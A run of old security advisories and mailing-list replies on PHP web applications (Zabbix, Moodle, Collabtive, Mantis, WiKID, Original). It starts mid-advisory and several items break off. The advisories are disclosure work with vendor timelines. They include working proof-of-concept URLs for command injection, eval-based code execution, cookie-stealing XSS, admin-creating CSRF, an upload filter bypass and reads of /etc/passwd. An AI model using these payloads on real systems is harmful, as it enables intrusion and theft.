Content-Length: 267 Content-Type: text/html; charset=iso-8859-1 !DOCTYPE HTML PUBLIC -//IETF//DTD HTML 2.0//EN htmlhead title302 Found/title /headbody h1Found/h1 pThe document has moved a href=javascript:alert('USH');here/a./p hr addressApache Server at 127.0.0.1 Port 80/address /body/html --8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-- Obiously the XSS is not automatic since browsers don't follow the javascript: URI handler in the Location header. A second XSS vulnerability, not based on HTTP tricks, exists: in the following code the the $return_link variable is reflected (printed) in the page body without any validation: --8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-- Line 371: the $return_link variable is printed in the page body without any validation. --8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-- # Check for a Return Link and print one if found.# if ($Config{'return_link_url'} $Config{'return_link_title'}) { print ul\n; print lia href=\$safeConfig
Zabbix 1.6.2 Frontend Multiple Vulnerabilities
Zabbix 1.6.2 Frontend Multiple Vulnerabilities Name Multiple Vulnerabilities in Zabbix Frontend Systems Affected Zabbix 1.6.2 and possibly earlier versions Severity High Impact (CVSSv2) High 9.7/10, vector: (AV:N/AC:L/Au:N/C:P/I:C/A:C) Vendorhttp://www.zabbix.com/ Advisory http://www.ush.it/team/ush/hack-zabbix_162/adv.txt Authors Antonio s4tan Parata (s4tan AT ush DOT it) Francesco ascii Ongaro (ascii AT ush DOT it) Giovanni evilaliv3 Pellerano (evilaliv3 AT digitalbullets DOT org) Date 20090303 I. BACKGROUND From the Zabbix web site: ZABBIX offers advanced monitoring, alerting and visualization features today which are missing in other monitoring systems, even some of the best commercial ones. II. DESCRIPTION Multiple Vulnerabilities exist in Zabbix front end software. III. ANALYSIS Summary: A) Remote Code Execution B) Cross Site Request Forgery C) Local File Inclusion A) Remote Code Execution A Remote Code Execution issue has been found in Zabbix version 1.6.2 and no authentication is required in order to exploit this vulnerability. The Magic Quotes must be off in order to exploit this vulnerability, however this feature will not be supported starting with PHP 6.0 (ref. http://it2.php.net/magic_quotes). Zabbix has a security feature that parses all incoming input for possible bad chars with the help of the function check_fields() defined in include/validate.inc.php. The issue we have discovered is contained in this input validation code. Pages define an array of every used variable that derives from external (GPC) input. An example of the mechanism is the following: --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- $fields=array( config= array(T_ZBX_INT, O_OPT, P_SYS, IN(0,1), NULL), // actions groupid=array(T_ZBX_INT, O_OPT, P_SYS|P_NZERO, DB_ID, NULL), hostid= array(T_ZBX_INT, O_OPT, P_SYS|P_NZERO, DB_ID, NULL), start= array(T_ZBX_INT, O_OPT, P_SYS, BETWEEN(0,65535).({}%. PAGE_SIZE.==0), NULL), next= array(T_ZBX_STR, O_OPT, P_SYS, NULL, NULL), prev= array(T_ZBX_STR, O_OPT, P_SYS, NULL, NULL), // filter filter_rst= array(T_ZBX_INT, O_OPT, P_SYS, IN(array(0,1)), NULL), filter_set= array(T_ZBX_STR, O_OPT, P_SYS, null, NULL), userid= array(T_ZBX_INT, O_OPT, P_SYS, DB_ID, NULL), 'filter_timesince'= array(T_ZBX_INT, O_OPT, P_UNSET_EMPTY, null, NULL), 'filter_timetill'= array(T_ZBX_INT, O_OPT, P_UNSET_EMPTY, null, NULL), //ajax 'favobj'= array(T_ZBX_STR, O_OPT, P_ACT, NULL, NULL), 'favid'= array(T_ZBX_STR, O_OPT, P_ACT, NOT_EMPTY, 'isset({favobj})'), 'state'= array(T_ZBX_INT, O_OPT, P_ACT, NOT_EMPTY, 'isset({favobj}) (filter=={favobj})'), ); check_fields($fields); --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- After the definition of the $fields array all the variables are checked by the function check_fields(). The main step of the check_fields() function is: --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- foreach($fields as $field = $checks){ $err |= check_field($fields, $field, $checks); } --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- Following the check_field() function we have identified that the function's main steps are the creation of some local variables using list() and a consequent call of calc_exp() (which resides in the same file). --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- list($type, $opt, $flags, $validation, $exception) = $checks; [...] $except=calc_exp($fields,$field,$exception); --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- calc_exp()'s code is: --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- function calc_exp($fields,$field,$expression){ if(zbx_strstr($expression,{}) !isset($_REQUEST[$field])) return FALSE; if(zbx_strstr($expression,{}) !is_array($_REQUEST[$field])) $expression = str_replace({},'$_REQUEST['.$field.']',$expression); if(zbx_strstr($expression,{}) is_array($_REQUEST[$field])){ foreach($_REQUEST[$field] as $key = $val){ $expression2 = str_replace({},'$_REQUEST['.$field.']['.$key.']',$expression); if(calc_exp2($fields,$field,$expression2)==FALSE) return FALSE; } return TRUE; } return calc_exp2($fields,$field,$expression); } --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- As you can see we should be able to call calc_exp2(), our vulnerable function, avoiding to fall into a breach that exits (returns) from the function. Investigating calc_exp2()'s source: --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- function calc_exp2($fields,$field,$expression){ foreach($fields as $f = $checks){ $expression = str_replace('{'.$f.'}','$_REQUEST['.$f.']',$expression); } $expression = trim($expression, ); $exec = return (.$expression.) ? 1 : 0;; $ret = eval($exec); return $ret; } --8--8--8--8--8--8--8--8--8--8--8--8--8
PHP filesystem attack vectors
PHP filesystem attack vectors Name PHP filesystem attack vectors Systems Affected PHP and PHP+Suhosin Vendorhttp://www.php.net/ Advisory http://www.ush.it/team/ush/hack-phpfs/phpfs_mad.txt Authors Francesco ascii Ongaro (ascii AT ush DOT it) Giovanni evilaliv3 Pellerano (giovanni.pellerano AT evilaliv3 DOT org) Date 20090207 I)Introduction II) The bugs in 50 words III) PHP filesystem functions path normalization attack IV) PHP filesystem functions path normalization attack details V)PHP filesystem functions path truncation attack VI) PHP filesystem functions path truncation attack details VII) The facts VIII) POC and attack code IX) Conclusions X)References I) Introduction On Apr 07, 2008 I spoke with Kuza55 and Wisec about an attack I found some time before that was a new attack vector for filesystem functions (fopen, (include|require)[_once]?, file_(put|get)_contents, etc) for the PHP language. It was a path normalization issue and I asked them to keep it secret [4], this was a good idea cause my analisys was mostly incomplete and erroneous but the idea was good and the bug was real and disposable. Later on Dec 24, 2008 on sla.ckers.org barbarianbob showed a path truncation attack against PHP that is partially based on mine attack. He discovered the bugs indipendently so he deserves full credits for them and his findings were dissected partially by Pragmatk on [2] and [3]. Sadly, or luckily, only the surface of these important issues has been analyzed and that's why we at ush.it are releasing this article: to bring complete light on them and present some additional juice. II) The bugs in 50 words As previously indicated there are two different bugs, the first, the one that I discovered on April 2008 that can be used independently for some purposes and the second one, discovered by barbarianbob that uses the first one to archieve a better goal. Let's see the details. - PHP filesystem functions path normalization attack PHP normalizes / and /. in path names allowing for example /etc/passwd/ or /etc/passwd/. to be succesfully opened as a file. - PHP filesystem functions path truncation attack PHP has a path truncation issue (a badly implemented snprintf()) allowing only MAX_PATH chars to be evaluated when actually opening a file or directory. III) PHP filesystem functions path normalization attack Normally one would expect that to open a file its path must be issued correctly: --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- $ php -r 'include(/etc/passwd);' | head -n1 root:x:0:0:root:/root:/bin/bash --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- While all of us are aware that some path normalizations are normal: --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- $ cat /etc//passwd | head -n1 root:x:0:0:root:/root:/bin/bash $ cat /etc/./passwd | head -n1 root:x:0:0:root:/root:/bin/bash --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- PHP does far more than what we are likely to expect: --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- php -r 'include(/etc/passwd/);' --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- As you can see the file is succesfully included (it works with every single filesystem function of PHP that makes use of _php_stream_fopen() and similiar functions). This is also part of the vector discovered by barbarianbob, while he uses it for different purposes from what I initially thought. But with vanilla PHP (the official source tree) it will not work and you'll get an error complaining about the fact that the target is not a directory. Why? Because barbarianbob, everybody who ran it succesfully, and me in my initial disclosure [4] were using a patched PHP (for example Suhosin, both loaded as .so or build-in, Ubuntu PHP, that is patched with Suhosin, etc). This is thanks to a deep and extensive testing and observation plus some code navigation and gdb magery with the help of evilaliv3 and Wisec. To overcome this limitation we came out with the universal path normalization vector for PHP that is not a single / but /.. Well this is the case in which a single char really changes things. --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- php -r 'include(/etc/passwd/.);' --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- This doesn't happen under normal circumstances. --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- $ cat /etc/passwd/. cat: /etc/passwd/.: Not a directory $ cat /etc/passwd/ cat: /etc/passwd/: Not a directory --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- We were already aware of the fact that these neutral chars could be repeated many times without affecting the result. --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- php -r 'include(/etc/passwd//);' php -r 'include(/etc/passwd/./././././.);' --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8
Moodle 1.9.3 Remote Code Execution
Moodle 1.9.3 Remote Code Execution Name Remote Code Execution in Moodle Systems Affected Moodle 1.9.3 and possibly earlier versions Severity High Impact (CVSSv2) High 7.3/10, vector: (AV:N/AC:L/Au:M/C:P/I:P/A:C) Vendorhttp://moodle.org/ Advisory http://www.ush.it/team/ush/hack-moodle193/moodle193.txt Authors Antonio s4tan Parata (s4tan AT ush DOT it) Francesco ascii Ongaro (ascii AT ush DOT it) Giovanni evilaliv3 Pellerano (evilaliv3 AT digitalbullets DOT org) Date 20081212 I. BACKGROUND From the Moodle web site: Moodle is a course management system (CMS) - a free, Open Source software package designed using sound pedagogical principles, to help educators create effective online learning communities. II. DESCRIPTION A Remote Code Execution exists in Moodle 1.9.3. III. ANALYSIS - Remote Code Execution (RCE) in texed.php (pathname parameter) A Remote Code Execution (RCE) vulnerability has been found in filter/tex/texed.php. In order to exploit this vulnerability register_globals must be enabled as the TeX Notation filter. All these conditions reduce the impact of the vulnerability, to remark this fact we have set multiple authentication flag in the cvss2 score). In texed.php we find the following instructions: --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- $cmd = tex_filter_get_cmd($pathname, $texexp); system($cmd, $status); --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- Where the function tex_filter_get_cmd, defined in lib.php, is the following: --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- function tex_filter_get_cmd($pathname, $texexp) { $texexp = escapeshellarg($texexp); $executable = tex_filter_get_executable(false); if ((PHP_OS == WINNT) || (PHP_OS == WIN32) || (PHP_OS == Windows)) { $executable = str_replace(' ', '^ ', $executable); return $executable ++ -e \$pathname\ -- $texexp; } else { return \$executable\ -e \$pathname\ -- $texexp; } } --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- As we can see no check is performed on the $pathname parameter neither in texed.php neither in the tex_filter_get_cmd function declared in lib.php. Seen this it's possible to exploit this vulnerability to execute arbitrary commands on the target server. The following urls are proof of concept for Linux and Windows: On Linux: http://www.example.com/moodle/filter/tex/texed.php?formdata=foopathname=foo;ls+-l;echo+; On Windows: http://www.example.com/moodle/filter/tex/texed.php?formdata=foopathname=foo+||+dir+||+echo+ This RCE is blind. You'll never see the list dir of the example because there is no print of the system command output. IV. DETECTION Moodle 1.9.3 and possibly earlier versions are vulnerable. V. WORKAROUND Proper input validation will fix the vulnerabilities. Actually the vulnerability is fixed in the Dev tree. Upgrade to latest development version. VI. VENDOR RESPONSE Vendor will not release a new version addressing this vulnerability since moodle has several different issues with register globals and the vendor decided to resolve them in a different way for the upcoming versions. At present we are working on changes that will prevent installation when register globals on. They should be committed later this week. I suppose we are not going to release 1.9.4 now because register globals issue is a know problem already. VII. CVE INFORMATION No CVE at this time. VIII. DISCLOSURE TIMELINE 20080121 Bug discovered 2008 Initial vendor contact (No Response) 20081811 Second vendor contact (No Response) 20081811 Vendor response 20081212 Advisory released (Fix available only in dev tree) IX. CREDIT Antonio s4tan Parata, Francesco ascii Ongaro and Giovanni evilaliv3 Pellerano are credited with the discovery of this vulnerability. Antonio s4tan Parata web site: http://www.ictsc.it/ mail: s4tan AT ictsc DOT it, s4tan AT ush DOT it Francesco ascii Ongaro web site: http://www.ush.it/ mail: ascii AT ush DOT it Giovanni evilaliv3 Pellerano mail: evilaliv3 AT digitalbullets DOT it X. LEGAL NOTICES Copyright (c) 2008 Francesco ascii Ongaro Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without mine express written consent. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email me for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
Collabtive 0.4.8 Multiple Vulnerabilities
Collabtive 0.4.8 Multiple Vulnerabilities Name Multiple Vulnerabilities in Collabtive Systems Affected Collabtive 0.4.8 and possibly earlier versions Severity High Impact (CVSSv2) High 8/10, vector: (AV:N/AC:L/Au:S/C:P/I:C/A:P) Vendorhttp://collabtive.o-dyn.de/ Advisory http://www.ush.it/team/ush/hack-collabtive048/adv.txt Authors Antonio s4tan Parata (s4tan AT ush DOT it) Francesco ascii Ongaro (ascii AT ush DOT it) Giovanni evilaliv3 Pellerano (evilaliv3 AT digitalbullets DOT org) Date 20080925 I. BACKGROUND From the Collabtive web site: Collabtive is collaborative software to get your projects done!. II. DESCRIPTION Multiple vulnerabilities exist in Collabtive software. III. ANALYSIS Summary: A) Stored Cross Site Scripting B) Forceful browsing authentication bypass C) Arbitrary file upload A) Stored Cross Site Scripting A stored XSS vulnerability exists in the /admin.php?action=projects section. Once the attacker specifies an XSS attack vector, like scriptalert(0);/script, as the Name property of a project then an XSS vulnerability occurs because the projects Name fields are stored and printed without any filtering. While the cited section poses limits on the Name field when reflecting the XSS payload, clicking on the edit link /manageproject.php?action=editformid=projectId results in a page without limitations on the characters showed thus allowing complete exploitation. This vulnerability requires administrator authentication. CSRF+XSS and timing (JS) can be used to successfully exploit this vulnerability in an automated manner. B) Forceful browsing authentication bypass An authentication bypass vulnerability exists in /admin.php?action=usersmode=added. Directly pointing to that URL shows an error, however at the bottom of the page there is a web form that permits to create new users with full privileges. With this vulnerability an attacker without any valid credentials can create a new valid administrator. Since this vulnerability has been discovered the exploitation prerequisites changed as detailed below: - A bug fix in the latest version 0.4.8 now requires globals on in order to exploit this vulnerability. - In version 0.4.6 instead the vulnerability is exploitable regardless the globals settings. C) Arbitrary file upload It's possible to upload arbitrary files with arbitrary extensions. An attacker that has not already gained Administration privileges using the previously exposed vulnerabilities must be assigned to at least one project. To upload a file go to /managefile.php?action=showprojectid=projectId and add a new file. If a file with .php extension is uploaded then the mimetype will be php/plain and the program will change the extension to .txt in order to prevent exploitation. This security control can be bypassed changing the mimetype to text/plain, in this way the application will believe that a normal .txt file was uploaded and the extension will not be changed. The uploaded file resides in /files/projectId/filename_$seed.php. An authenticated attacker will simply see the seed (and the complete filename) using the web interface and can directly execute it. In case of unauthenticated attackers the filename must be guessed. Luckily the make_seed() routine leaks real random proprieties and is only based on the time. $seed can be easily bruteforced using values that are likely to match the return derived by the microtime() of the upload. private function make_seed() { list($usec, $sec) = explode(' ', microtime()); $value = (float) $sec + ((float) $usec * 10); return $value; } As easily understandable $seed can be guessed in really few tries. The same vulnerability exists when attaching a file in the Messages section. This vulnerability can also be exploited via CSRF. IV. DETECTION Collabtive 0.4.8 and possibly earlier versions are vulnerable. V. WORKAROUND Proper input validation will fix the vulnerabilities. VI. VENDOR RESPONSE No fix available. VII. CVE INFORMATION No CVE at this time. VIII. DISCLOSURE TIMELINE 20080926 Initial vendor contact (No Response) 20081003 Second vendor contact (No Response) 20081010 Third vendor contact 20081010 Vendor response (Fix promised for the end of October) 20081010 Vendor contact to sync disclosure time (No response) 20081110 Advisory released (Fix not available) IX. CREDIT Antonio s4tan Parata, Francesco ascii Ongaro and Giovanni evilaliv3 Pellerano are credited with the discovery of this vulnerability. Antonio s4tan Parata web site: http://www.ictsc.it/ mail: s4tan AT ictsc DOT it, s4tan AT ush DOT it Francesco ascii Ongaro web site: http://www.ush.it/ mail: ascii AT ush DOT it Giovanni evilaliv3 Pellerano mail: evilaliv3 AT digitalbullets DOT org X. LEGAL NOTICES Copyright (c) 2008 Francesco ascii Ongaro Permission is granted for the redistribution
Mantis Bug Tracker 1.1.1 Multiple Vulnerabilities
Mantis Bug Tracker 1.1.1 Multiple Vulnerabilities Name Multiple Vulnerabilities in Mantis Systems Affected Mantis 1.1.1 and possibly earlier versions Severity High Impact (CVSSv2) High 9/10, vector: (AV:N/AC:L/Au:N/C:C/I:P/A:P) Vendorhttp://www.mantisbt.org/ Advisory http://www.ush.it/team/ush/hack-mantis111/adv.txt Authors Antonio s4tan Parata (s4tan AT ush DOT it) Francesco ascii Ongaro (ascii AT ush DOT it) Date 20080520 I. BACKGROUND From the Mantis web site: Mantis is a free popular web-based bug tracking system. It is written in the PHP scripting language and works with MySQL, MS SQL, and PostgreSQL databases and a webserver.. II. DESCRIPTION Multiple vulnerabilities exist in Mantis software (XSS, CSRF, Remote Code Execution). III. ANALYSIS Summary: A) XSS Vulnerabilities return_dynamic_filters.php (filter_target parameter) B) CSRF Vulnerabilities manage_user_create.php C) Remote Code Execution Vulnerabilities adm_config_set.php (value parameter) A) XSS Vulnerabilities We have found an XSS vulnerability in return_dynamic_filters.php. In order to exploit this vulnerability the attacker must be authenticated. Usually the anonymous user is allowed on typical installation, so the impact is a bit higher. The following url is a proof of concept: http://www.example.com/mantis/return_dynamic_filters.php?filter_target= scriptalert(document.cookie);/script B) CSRF Vulnerabilities There is a Cross Site Request Forgery vulnerability in the software. If a logged in user with administrator privileges clicks on the following url: http://www.example.com/mantis/manage_user_create.php?username=foorealn ame=aapassword=aapassword_verify=aa[EMAIL PROTECTED]access_lev el=90protected=0enabled=1 a new user 'foo' with administrator privileges is created. The password of the new user is sent to [EMAIL PROTECTED] C) Remote Code Execution Vulnerabilities Finally we present the most critical vulnerability. A Remote Code Execution vulnerability exists in the software, but it can be exploited only if the attacker has a valid administrator account, so it could be ideal if used in conjunction with the previous one. The vulnerability is in the file adm_config_set.php. On row 80 we have the following statement: eval( '$t_value = ' . $f_value . ';' ); where the $f_value is defined at row 34 of the same file: $f_value = gpc_get_string( 'value' ); the parameter $f_value is never validated, so we can exploit this issue with the following url which executes the phpinfo() function: http://www.example.com/mantis/adm_config_set.php?user_id=0project_id=0 config_option=cache_configtype=0value=0;phpinfo() IV. DETECTION Mantis 1.1.1 and possibly earlier versions are vulnerable. V. WORKAROUND Proper input validation will fix the vulnerabilities. Upgrade to latest development version 1.2.0a1. VI. VENDOR RESPONSE It was a little surprise to find out that somebody issued CVE-2008-2276 during our responsible disclosure time-line. From an internal email with Glenn Henshaw: --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- # 8974 : XSS Vulnerability in filters - fixed for 1.1.2 # 8977 : Port 0008974: XSS Vulnerability in filters - fixed for 1.2.0 and future - this issue has been fixed by escaping the data in the error message. # 8976 : Remote Code Execution in adm_config - workaround in place in 1.1.2 - this page is only accessible to registered administrators # 8980 : Port: Remote Code Execution in adm_config - workaround in place in 1.2.0 and beyond - this page is only accessible to registered administrators # 8975 : CSRF Vulnerabilities in user_create # 8995 : Port: CSRF Vulnerabilities in user_create - this has been fixed by ensuring that action pages can only be accessed via POST commands. --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- So CSRF Vulnerabilities in user_create is an our finding. The vendor fixed by allowing only POST parameters that is obviously a non-fix. Our response: --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- This alone isn't enough since forms can be auto-submitted by js that are irrespective of the same-orgin policy. Proper remediation should include referer checking (has proved to be spoofable on the client side in the past so not a bulletproof technique) and token checking (a random string or an hash generated when the user requires the frontend, stored serverside - sessions are okay -, included in the frontend form and sent to and verified by the backend). These two protections ensure that an action cannot, hopefully, be CSRFed (at last in absence of an xss vuln that neutralize the same origin policy again). --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- Glenn response: --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- Thanks for the notice. The CSRF patch
WiKID wClient-PHP = 3.0-2 Multiple XSS Vulnerabilities
WiKID wClient-PHP = 3.0-2 Multiple XSS Vulnerabilities Name Multiple Vulnerabilities in wClient-PHP Systems Affected wClient-PHP 3.0-2 and earlier versions Severity Medium Impact (CVSSv2) Medium (5/10, vector: AV:N/AC:L/Au:N/C:C/I:N/A:N) Vendorhttp://www.wikidsystems.com/ Advisory http://www.ush.it/team/ush/hack-wclient/wikid.txt AuthorFrancesco ascii Ongaro (ascii AT ush DOT it) Antonio s4tan Parata (s4tan AT ush DOT it) Date 20080411 I. BACKGROUND From the WiKID website: The WiKID Strong Authentication System is a dual-source, software-based two-factor authentication system designed to be less expensive and more extensible than hardware tokens. II. DESCRIPTION In the wClient-PHP package PHP_SELF is echoed back to the client without proper sanitization leading to XSS issues. WiKID mantainers have released a new version of the software (3.0-3) that fixes exposed vulnerabilities and can be downloaded from the url: http://www.wikidsystems.com/downloads/network-clients Users that based their implementations on the code contained in sample.php are advised to upgrade. III. ANALYSIS During a review of the wClient-PHP-3.0-1.tar.gz package (an additional component of WiKID with network client functions) the following vulnerabilities were identified in the sample code: file sample.php, line 251: PHP_SELF insecure usage leads to XSS form action=?php echo $PHP_SELF ? method=POST file sample.php, line 269: PHP_SELF insecure usage leads to XSS form action=?php echo $PHP_SELF ? method=POST file sample.php, line 279: PHP_SELF insecure usage leads to XSS form action=?php echo $PHP_SELF ? method=POST file sample.php, line 292: possible PHP_SELF insecure usage leads to XSS form action=?php echo $PHP_SELF ? method=POST This one was not verified since it's not enabled in the version I have downloaded but probably it's exploitable in the exact same way as the other ones. file sample.php, line 306: PHP_SELF insecure usage leads to XSS form action=?php echo $PHP_SELF ? method=POST $PHP_SELF can be exploited by requesting an URL like file.php/XSS. Note: On recent PHP versions $PHP_SELF should be $_SERVER['PHP_SELF']. In case of register_globals=On on recent versions where the variable is undefined it's possible to override it by issuing PHP_SELF with the wished value in GPC (GET, POST, COOKIE). On old version of PHP it's possible to drive the value of PHP_SELF by GLOBALS poisoning [1]. Version 3.0-2 fix $PHP_SELF instances to $_SERVER['PHP_SELF'], users are strongly advised to do not use this version as it doesn't correctly fix presented vulnerabilities and is more exploitable than 3.0-1. An attacker can steal UserID, Passcode, Domain code and Registration code before they are sent back to the server itself and potentially poison the navigation of the user and steal other sensitive informations via social engineering (injecting additional fields in the form or showing additional functions to the user) abusing user's trust. Remediation consists in proper escaping the user controlled inputs. [1] http://www.ush.it/2006/01/25/php5-globals-vulnerability/ VII. CVE INFORMATION No CVE at this time. VIII. DISCLOSURE TIMELINE 20080320 Bug discovered 20080320 Vendor contacted 20080411 Advisory released IX. CREDIT Francesco ascii Ongaro and Antonio s4tan Parata are credited with the discovery of this vulnerability. Francesco ascii Ongaro web site: http://www.ush.it/ mail: ascii AT ush DOT it Antonio s4tan Parata web site: http://www.ictsc.it/ mail: s4tan AT ictsc DOT it, s4tan AT ush DOT it X. LEGAL NOTICES Copyright (c) 2008 Francesco ascii Ongaro Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without mine express written consent. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email me for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
Original Photo Gallery Remote Command Execution
Original Photo Gallery Remote Command Execution Name Original Photo Gallery Remote Command Execution Systems Affected Original 0.11.2 version and below Severity High Vendorhttp://jimmac.musichall.cz/original.php Advisory http://www.ush.it/team/ascii/hack-original/advisory_updated.txt http://www.ush.it/team/ascii/hack-original/advisory.txt AuthorFrancesco `ascii` Ongaro, Antonio `s4tan` Parata Date 20070919 I. BACKGROUND Original is a set of scripts to get your digital photos on the web. It aims to be as simple to maintain as possible. The systems consist of two parts: a client side script to scale your images to different sizes, create archives of an album, attach optional metadata and a php script to render html pages of the picture gallery. II. DESCRIPTION It's possible to execute arbitrary code on remote systems which have installed a vulnerable software version. III. ANALYSIS The file inc/exif.inc.php contains the following vulnerable statement: exec($exif_prog \$gallery_dir/$galerie/lq/img-$snimek.jpg\, $exif_data, $exif_status);. If PHP is configured with the globals on option, an attacker can execute arbitrary code doing a direct request to the file and sending shell commands in the parameter/value $exif_prog. IV. DETECTION http://www.x.com/original/inc/exif.inc.php?exif_prog=/path/to/touch%20/tmp/p0wn3d.txt; The request should create a file in the /tmp directory (on Unix systems) named p0wn3d.txt. If this happens than you have a vulnerable version of the software (and a really risky PHP setup). A rapid measurement show that ~10% systems are vulnerable of about 17'000 listed on Google (using the dork: Generated by Original ver). V. WORKAROUND Upgrade to the new version 0.11.3 witch fix this vulnerability. http://jimmac.musichall.cz/zip/original/original-0.11.3.tar.bz2 Or if unable to upgrade: 1) Disable access to the directory using Limit (vhosts/.htaccess). 2) Disable execution using disable_functions in php.ini. The result is: Warning: exec() has been disabled for security reasons in /home/XXX/inc/exif.inc.php on line 157 3) Deny direct access to the file in the PHP code by checking for a define or requested url. VI. VENDOR RESPONSE The vendor has promptly replied and addressed the problem issuing a new release. Original version 0.11.3 is available here: http://jimmac.musichall.cz/zip/original/original-0.11.3.tar.bz2 VII. CVE INFORMATION No CVE at this time. VIII. DISCLOSURE TIMELINE 20070719 Bug discovered 20070725 Vendor contacted 20070927 Vendor reply and fix 20071002 Advisory released IX. CREDIT Francesco `ascii` Ongaro and Antonio `s4tan` Parata are credited with the discovery of this vulnerability. X. LEGAL NOTICES Copyright (c) 2007 Francesco `ascii` Ongaro Note: this exploit is DUAL LICENSED, 1. if you'll use it for personal and non-profit purposes you can apply GPL v2 and above. 2. In the case you plain to: a. use our code in any commercial context b. implement this code in your non-GPL application c. use this code during a Penetration Test d. make any profit from it you need to contact me in order to obtain a _commercial license_. For more informations about Dual Licensing: http://producingoss.com/html-chunk/dual-licensing.html Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without mine express written consent. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email me for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
Re: [Full-disclosure] Cross Domain XMLHttpRequest
Michal Majchrowicz wrote: Due to security reasons many Web Browsers doesn't allow cross domain XMLHttpRequests. [..] hi Michal, personally i don't get your point (to me it seems just an hybrid implementation using both server side and client side scripting) but i'm sure you can better explain your intents from what i saw it asks a php page to make an http query to the foreign domain and then display back the page contents using js so i suppose this is not a vulnerability at all, just an implementation to (??) pass to javascript remote contents fetched using a machine != from the client/browser/whenether anyway your implementation is a bit flawed http://sectroyer.110mb.com/myhttp.php?url=file://myhttp.phpmethod=get --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- ?php if(isset($_GET['url'])==true) { $curl=curl_init(); curl_setopt($curl,CURLOPT_COOKIE,$_GET['cookie']); curl_setopt($curl,CURLOPT_URL,rawurldecode($_GET['url'])); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); if(($_GET['method']==post) (isset($_GET['vars'])==true)) { $vars=rawurldecode($_GET['vars']); curl_setopt($curl,CURLOPT_POSTFIELDS,$vars); } $tmp=curl_exec($curl); curl_close($curl); echo myglobalcallback(\.rawurlencode($tmp).\);; } ? --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- this is basically a proxy, it can make get/post requests to http only hosts, saturate the server bandwidth *PLUS* naturally fetch any local file : ) http://sectroyer.110mb.com/myhttp.php?url=file:///etc/passwdmethod=get please correct me if i misunderstood best regards, Francesco `ascii` Ongaro http://www.ush.it/
Re: Php Nuke POST XSS on steroids
Paul Laudanski wrote: I tried both your scripts at a few locations, and all I get back is this [cut] hi Paul, long time from ccc : ) it happens because http headers must be on a single line, it's a formatting issue (my fault, i used to put a link to a plain text version but this time i forgot about it), i've just created a txt version of the advisory available here: http://phpfi.com/214668 it should be more usable, i dunno when the demos will stop working on phpnuke.org so i've asked wisec to upload this video since www.ush.it has bandwidth issues http://www.wisec.it/ush/phpnukexss.html obviously to bypass the anti-CSRF filter you have to mix the XSS with the import_request_variables() trick (this doesn't work on phpnuke.org because they have globals on, this is why i choose that domain) consider that import_request_variables() will allows you to do much more than an XSS, this is just an example advisory on an example product See you, Francesco `ascii` Ongaro http://www.ush.it/
Re: [Full-disclosure] PHP import_request_variables() arbitrary variable overwrite
